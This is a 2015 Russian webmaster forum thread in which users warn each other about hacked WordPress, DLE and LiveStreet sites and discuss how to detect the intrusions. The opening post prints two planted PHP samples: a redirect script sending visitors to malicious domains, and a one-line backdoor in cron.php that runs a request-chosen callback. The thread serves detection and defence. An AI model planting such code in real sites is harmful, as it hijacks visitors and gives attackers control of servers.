X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> Очередная волна атак на сайты
OldSpice
OldSpice
Topic Starter сообщение 13.5.2015, 22:24; Ответить: OldSpice
Сообщение #1


Старожил
******

Группа: Active User
Сообщений: 1600
Регистрация: 17.8.2011
Из: Латвия
Поблагодарили: 264 раза
Репутация:   49  


Парни, хочу вас предупредить об активности ушлепков-какеров. Собственно советую проверить, не появились ли у вас на хостинге новые файлики с веселыми названиями secret.php, needle.php, earth.php, early.php, eight.php и тому подобные. Сделайте сортировку по дате и посмотрите последние созданные файлы.

Содержание у них либо закодированное в base64 либо вот такое:
Код
<?php

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$android_urls = array (
            'http://com-rj4.net/?a=314759&c=wl_con&s=11A',
            'http://com-gkz.net/?a=314759&c=wl_con&s=11A',    
            'http://com-8qq.net/?a=314759&c=wl_con&s=11A',            
);
$not_android_urls = array (
            'http://com-rj4.net/?a=314759&c=wl_con&s=11ALL',
            'http://com-gkz.net/?a=314759&c=wl_con&s=11ALL',    
            'http://com-8qq.net/?a=314759&c=wl_con&s=11ALL',    
);
$n = mt_rand(0,count($not_android_urls)-1);
$rand_url=$not_android_urls[$n];

if ( $android  == true)
{
$n = mt_rand(0,count($android_urls)-1);
$rand_url=$android_urls[$n];
}
?>
<meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">


Также внимание на cron.php. Скорее всего ваш оригинальный был заменен на этот:
Код
<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>


Будьте аккуратней, парни!

Так же давайте обсудим как (кроме смены паролей к фтп) с этим шлаком бороться. От себя могу добавить, что неделей ранее я поймал браузерный вирус.
В корне лежит .ftpaccess, но он уже походу не помогает..

Сообщение отредактировал OldSpice - 13.5.2015, 22:24


--------------------
Вот тут я продвигаю твои группы в Одноклассниках :)
Живое продвижение, активные заинтересованные люди!


Поблагодарили: (2)
4
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
batueff888
batueff888
сообщение 13.5.2015, 22:46; Ответить: batueff888
Сообщение #2


Участник
***

Группа: User
Сообщений: 146
Регистрация: 21.1.2015
Из: Россия
Поблагодарили: 54 раза
Репутация:   6  


OldSpice, у меня установлен плагин "WordPress File Monitor Plus", если есть какие-либо изменения в файлах, тут же сообщает мне на почту, причем конкретно указывает в каком файле какие изменения произошли.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Вентилятор
Вентилятор
сообщение 14.5.2015, 3:01; Ответить: Вентилятор
Сообщение #3


покупаю хорошие проекты
******

Группа: Active User
Сообщений: 1815
Регистрация: 8.8.2010
Поблагодарили: 606 раз
Репутация:   106  


OldSpice, о какой cms речь?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
OldSpice
OldSpice
Topic Starter сообщение 14.5.2015, 10:43; Ответить: OldSpice
Сообщение #4


Старожил
******

Группа: Active User
Сообщений: 1600
Регистрация: 17.8.2011
Из: Латвия
Поблагодарили: 264 раза
Репутация:   49  


О всех :)
У меня попортили вордпресс, дле и лайвстрит.

Сообщение отредактировал OldSpice - 14.5.2015, 10:43


--------------------
Вот тут я продвигаю твои группы в Одноклассниках :)
Живое продвижение, активные заинтересованные люди!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
andrey10tic
andrey10tic
сообщение 14.5.2015, 10:55; Ответить: andrey10tic
Сообщение #5


Бывалый
****

Группа: User
Сообщений: 496
Регистрация: 14.5.2014
Из: Москва
Поблагодарили: 145 раз
Репутация:   13  


Раньше я заметил такое на DLE. Походу некоторые "вундеркинды" взломав оставляют ссылки от своих сайтов.

Сообщение отредактировал andrey10tic - 14.5.2015, 10:56


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
phoenix_kys
phoenix_kys
сообщение 14.5.2015, 10:58; Ответить: phoenix_kys
Сообщение #6


Старожил
******

Группа: Active User
Сообщений: 1467
Регистрация: 15.5.2009
Поблагодарили: 215 раз
Репутация:   36  


OldSpice,

у вас дырка в каком-то одном сайте, через который закинуты эти вирусные файлы во все сайты на данном аккаунте
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
x64
x64
сообщение 14.5.2015, 11:07; Ответить: x64
Сообщение #7


F.A.L.L.O.U.T.
*******

Группа: Super Moderator
Сообщений: 3544
Регистрация: 30.6.2011
Из: Железнодорожный (Балашиха)
Поблагодарили: 2881 раз
Репутация:   294  


Цитата(phoenix_kys @ 14.5.2015, 9:58) *
у вас дырка в каком-то одном сайте

Встречал такую ситуацию, что со своих сайтов можно было кошмарить соседей по серверу.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
webFlomaster
webFlomaster
сообщение 14.5.2015, 11:12; Ответить: webFlomaster
Сообщение #8


Частый гость
**


Группа: User
Сообщений: 74
Регистрация: 28.2.2014
Поблагодарили: 36 раз
Репутация:   9  


batueff888, простое но эффективное решение, пошел гуглить и ставить себе. А вы случайно не знаете такого же плана плагин только для Joomla?


--------------------
Семантическое ядро - качественно, со скидками делают здесь
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Вентилятор
Вентилятор
сообщение 14.5.2015, 13:42; Ответить: Вентилятор
Сообщение #9


покупаю хорошие проекты
******

Группа: Active User
Сообщений: 1815
Регистрация: 8.8.2010
Поблагодарили: 606 раз
Репутация:   106  


OldSpice,
Цитата(OldSpice @ 14.5.2015, 9:43) *
О всех
У меня попортили вордпресс, дле и лайвстрит.

т.е. насколько понял ситуацию, конкретно у вас каким-то образом взломали сайты?

просто не понятно, с чего вы взяли, что это именно "волна атак", а не просто ваши недоработки по безопасности.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Зотов
Зотов
сообщение 14.5.2015, 13:54; Ответить: Зотов
Сообщение #10


Копирайтер, стаж 7 лет
******

Группа: Active User
Сообщений: 1415
Регистрация: 11.4.2012
Из: Краснодарский край
Поблагодарили: 369 раз
Репутация:   40  


Цитата(x64 @ 14.5.2015, 11:07) *
Встречал такую ситуацию, что со своих сайтов можно было кошмарить соседей по серверу.


На reg.ru такая дырища была. Я им говорил про это - они отвечают, что это ваши половые трудности, разгребайтесь сами.

Посмотрел свои сайты, вроде всё чисто.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Куплю сайты от 1к уников в сутки
Можно без дохода
0 Ksardas777 364 Вчера, 20:44
автор: Ksardas777
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
312 kaartes 113091 22.5.2018, 12:07
автор: avega
Открытая тема (нет новых ответов) Покупаю муз сайты
не дорого/под развитие
4 seostock 1414 16.5.2018, 21:44
автор: seostock
Открытая тема (нет новых ответов) Куплю сайты принятые в РСЯ
Можно без дохода
0 Ksardas777 367 16.5.2018, 18:10
автор: Ksardas777
Открытая тема (нет новых ответов) Дизайн + верстка от 115$ | Сайты и лендинги | Редизайн
0 Flegs 312 16.5.2018, 13:27
автор: Flegs


 



RSS Текстовая версия Сейчас: 28.5.2018, 14:10
Дизайн